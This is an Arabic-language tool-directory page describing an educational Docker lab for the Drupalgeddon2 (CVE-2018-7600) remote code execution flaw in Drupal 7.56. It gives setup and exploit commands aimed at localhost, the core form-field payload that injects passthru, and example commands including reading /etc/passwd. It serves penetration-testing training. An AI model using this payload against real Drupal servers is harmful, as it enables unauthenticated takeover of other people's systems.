Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2018-7600-drupalgeddon2-lab — مختبر تعليمي يوضح ثغرة CVE-2018-7600 (Drupalgeddon2) لتنفيذ الأكواد عن بُعد باستخدام بيئة دروبال 7.56 الضعيفة المبنية على Docker. | Kitploit
أدوات/GitHubGitHub/meraj1312/cve-2018-7600-drupalgeddon2-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHub
meraj1312/cve-2018-7600-drupalgeddon2-lab

cve-2018-7600-drupalgeddon2-lab

مختبر تعليمي يوضح ثغرة CVE-2018-7600 (Drupalgeddon2) لتنفيذ الأكواد عن بُعد باستخدام بيئة دروبال 7.56 الضعيفة المبنية على Docker.

عرض المستودع
113منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر ثغرة CVE-2018-7600 (Drupalgeddon2)

مختبر تعليمي يوضح استغلال ثغرة CVE-2018-7600 (Drupalgeddon2) باستخدام بيئة دروبال 7.56 ضعيفة تم إعدادها باستخدام Docker.

يحاكي هذا المشروع سير عمل تقييم الثغرات الواقعي، بما في ذلك:

  • إعداد البيئة الضعيفة
  • الاكتشاف (الماسح الضوئي)
  • الاستغلال (RCE)
  • تحليل الحمولة
  • التوثيق

نظرة عامة عن الثغرة

ثغرة CVE-2018-7600 (Drupalgeddon2) هي ثغرة حرجة من نوع تنفيذ الأوامر عن بُعد (RCE) في نظام إدارة المحتوى دروبال.

توجد المشكلة في واجهة Form API في دروبال، حيث يمكن تفسير المدخلات التي يتحكم بها المستخدم كمصفوفات عرض (render arrays)، مما يسمح للمهاجمين بحقن استدعاءات خبيثة مثل:

  • passthru
  • system
  • exec

يؤدي ذلك إلى تنفيذ أوامر على الخادم دون مصادقة.

التأثير

  • تنفيذ أوامر عن بُعد
  • لا حاجة للمصادقة
  • اختراق كامل للخادم

الإصدار المستهدف

  • دروبال 7.56 (ضعيف)

بنية المختبر

root@kitploit:~
المهاجم (Kali Linux)
|
| طلبات HTTP
v
دروبال 7.56 (ضعيف)
|
v
قاعدة بيانات MySQL


التقنيات المستخدمة

  • Docker
  • Docker Compose
  • نظام إدارة المحتوى دروبال
  • MySQL
  • Kali Linux
  • Python (الأداة الاستغلالية والماسح الضوئي)

هيكل المستودع

root@kitploit:~

cve-2018-7600-drupalgeddon2-lab
│
├── README.md
├── setup.md
├── scan.py
├── exploit.py
│
├── lab-setup/
│   └── docker-compose.yml
│
├── screenshots/
│   ├── drupal-dashboard.png
│   ├── drupal-version.png
│   └── rce-output.png
│
├── logs/
│   ├── scan_results.txt
│   └── exploit_log.txt
│
├── payloads/
│   └── payload-list.txt
│
├── report/
│   └── drupalgeddon2-report.pdf


لقطات الشاشة

لوحة تحكم دروبال

لوحة تحكم دروبال

تأكيد الإصدار

إصدار دروبال


البدء السريع

استنساخ المستودع

root@kitploit:~
git clone https://github.com/Meraj1312/cve-2018-7600-drupalgeddon2-lab.git
cd cve-2018-7600-drupalgeddon2-lab

تشغيل المختبر

root@kitploit:~
docker compose up -d

الوصول إلى الهدف

root@kitploit:~
http://localhost:8080

الاكتشاف والاستغلال

1. مسح الثغرة

root@kitploit:~
python3 scan.py http://localhost:8080

مثال على المخرجات:

root@kitploit:~
[~] Scanning http://localhost:8080... VULNERABLE

2. الاستغلال (RCE)

root@kitploit:~
python3 exploit.py http://localhost:8080 id

مثال على المخرجات:

root@kitploit:~
uid=33(www-data) gid=33(www-data)

مثال على الحمولة

الهيكل الأساسي للحمولة المستخدمة:

root@kitploit:~
name[#post_render][]=passthru
name[#type]=markup
name[#markup]=whoami

أوامر مثال:

root@kitploit:~
whoami
id
cat /etc/passwd

قائمة الحمولات الكاملة متوفرة في:

root@kitploit:~
payloads/payload-list.txt

استراتيجية التوثيق

للحفاظ على هيكل مستودع نظيف واحترافي:

يحتوي README على:

  • نظرة عامة عن الثغرة
  • تعليمات إعداد المختبر
  • أمثلة أساسية للحمولات
  • كيفية تشغيل الماسح الضوئي وأداة الاستغلال

يحتوي تقرير PDF (report/drupalgeddon2-report.pdf) على:

  • خطوات الاستغلال التفصيلية
  • طلبات واستجابات Burp Suite
  • نتائج اختبار الحمولات
  • لقطات شاشة أثناء التنفيذ
  • شرح تقني للثغرة

يضمن هذا الفصل:

  • عرض نظيف على GitHub
  • توثيق فني كامل

الغرض التعليمي

هذا المختبر مخصص لـ:

  • طلاب الأمن السيبراني
  • تدريب اختبار الاختراق
  • أبحاث الثغرات
  • تعلم تطوير الاستغلالات

إخلاء مسؤولية

هذا المشروع مخصص للأغراض التعليمية والبحثية فقط.

لا تحاول استغلال الأنظمة دون الحصول على إذن صريح.

المؤلفون غير مسؤولين عن أي استخدام سيء.

تنزيل الأداة